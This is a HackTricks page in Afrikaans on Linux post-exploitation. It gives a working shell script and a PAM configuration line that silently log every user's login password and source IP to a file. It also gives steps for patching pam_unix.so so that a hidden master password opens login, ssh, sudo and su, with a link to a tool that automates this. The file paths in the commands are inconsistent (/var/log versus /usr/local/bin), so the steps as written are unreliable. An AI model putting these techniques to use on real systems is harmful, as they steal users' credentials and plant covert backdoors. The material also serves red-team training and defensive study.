Afrikaans - Ht
HackTricks Training Twitter Linkedin Sponsor

Linux Post-Exploitation

Leer & oefen AWS Hack:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hack: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Sniffing Aanteken Wagwoorde met PAM

Laat ons 'n PAM-module konfigureer om elke wagwoord wat elke gebruiker gebruik om in te teken, te registreer. As jy nie weet wat PAM is nie, kyk:

PAM - Pluggable Authentication Modules

Vir verdere besonderhede, kyk na die oorspronklike pos. Dit is net 'n opsomming:

Tegniek Oorsig: Pluggable Authentication Modules (PAM) bied buigsaamheid in die bestuur van outentifikasie op Unix-gebaseerde stelsels. Hulle kan die sekuriteit verbeter deur die aanpassing van die aanmeldingsproses, maar hulle kan ook risiko's inhou as dit verkeerd gebruik word. Hierdie opsomming skets 'n tegniek om aanmeldingskredensiale met PAM vas te vang, tesame met maatreëls vir verligting.

Vaslegging van Kredensiale:

  • 'n bash-skrip met die naam toomanysecrets.sh word geskep om aanmeldingspogings te registreer, waar die datum, gebruikersnaam ($PAM_USER), wagwoord (via stdin), en afgeleë gasheer IP ($PAM_RHOST) na /var/log/toomanysecrets.log vasgelê word.

  • Die skrip word uitvoerbaar gemaak en geïntegreer in die PAM-konfigurasie (common-auth) deur die pam_exec.so-module te gebruik met opsies om stil te hardloop en die outentiseringsleutel aan die skrip bloot te stel.

  • Die benadering demonstreer hoe 'n gekompromitteerde Linux-gasheer uitgebuit kan word om kredensiale stiekem te registreer.

#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh

Backdooring PAM

Vir verdere besonderhede, kyk na die oorspronklike pos. Hierdie is net 'n opsomming:

Die Pluggable Authentication Module (PAM) is 'n stelsel wat onder Linux gebruik word vir gebruikersverifikasie. Dit werk op drie hoofkonsepte: gebruikersnaam, wagwoord, en diens. Konfigurasie lêers vir elke diens is geleë in die /etc/pam.d/ gids, waar gedeelde biblioteke verifikasie hanteer.

Doel: Wysig PAM om verifikasie met 'n spesifieke wagwoord moontlik te maak, deur die werklike gebruikerswagwoord te omseil. Dit fokus veral op die pam_unix.so gedeelde biblioteek wat deur die common-auth lêer gebruik word, wat deur byna alle dienste vir wagwoordverifikasie ingesluit word.

Stappe vir die Wysiging van pam_unix.so:

  1. Vind die Verifikasie Direktief in die common-auth lêer:

  • Die lyn verantwoordelik vir die kontrole van 'n gebruiker se wagwoord roep pam_unix.so aan.

  1. Wysig die Bronkode:

  • Voeg 'n kondisionele verklaring by in die pam_unix_auth.c bronlêer wat toegang verleen as 'n voorafbepaalde wagwoord gebruik word, anders gaan dit voort met die normale verifikasieproses.

  1. Herstel en Vervang die gewysigde pam_unix.so biblioteek in die toepaslike gids.

  2. Toetsing:

  • Toegang word verleen oor verskeie dienste (aanmelding, ssh, sudo, su, skermspaarder) met die voorafbepaalde wagwoord, terwyl normale verifikasieprosesse onveranderd bly.

Jy kan hierdie proses outomatiseer met https://github.com/zephrax/linux-pam-backdoor

Leer & oefen AWS Hack: HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hack: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks
PreviousLinux Environment VariablesNextPAM - Pluggable Authentication Modules

Last updated